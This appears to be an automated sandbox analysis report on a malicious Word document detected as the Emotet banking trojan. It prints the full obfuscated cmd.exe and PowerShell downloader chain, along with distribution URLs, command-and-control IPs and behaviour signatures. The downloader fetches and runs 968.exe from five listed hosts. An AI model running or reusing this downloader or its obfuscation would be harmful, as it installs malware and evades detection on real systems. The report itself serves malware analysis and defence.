Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\968.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\startedradar.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B277F RtlGetVersion,GetNativeSystemInfo,12_2_004B277F
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 105688 Sample: PAY3646944800277778.doc Startdate: 23/01/2019 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Antivirus detection for URL or domain 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 5 other signatures 2->69 12 WINWORD.EXE 43 60 2->12         started        15 startedradar.exe 2->15         started        17 svchost.exe 4 2->17         started        process3 signatures4 79 Document exploit detected (process start blacklist hit) 12->79 19 cmd.exe 1 12->19         started        81 Detected Emotet e-Banking trojan 15->81 83 Drops executables to the windows directory (C:\Windows) and starts them 15->83 21 startedradar.exe 15->21         started        process5 dnsIp6 24 cmd.exe 1 19->24         started        26 conhost.exe 19->26         started        50 189.253.39.50, 49801, 8080 UninetSAdeCVMX Mexico 21->50 53 206.248.110.184, 8080 LCPR-HSD-LibertyCablevisionofPuertoRicoLTDPR Puerto Rico 21->53 55 182.180.170.72, 22, 49797 PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK Pakistan 21->55 signatures7 71 Detected TCP or UDP traffic on non-standard ports 53->71 process8 process9 28 cmd.exe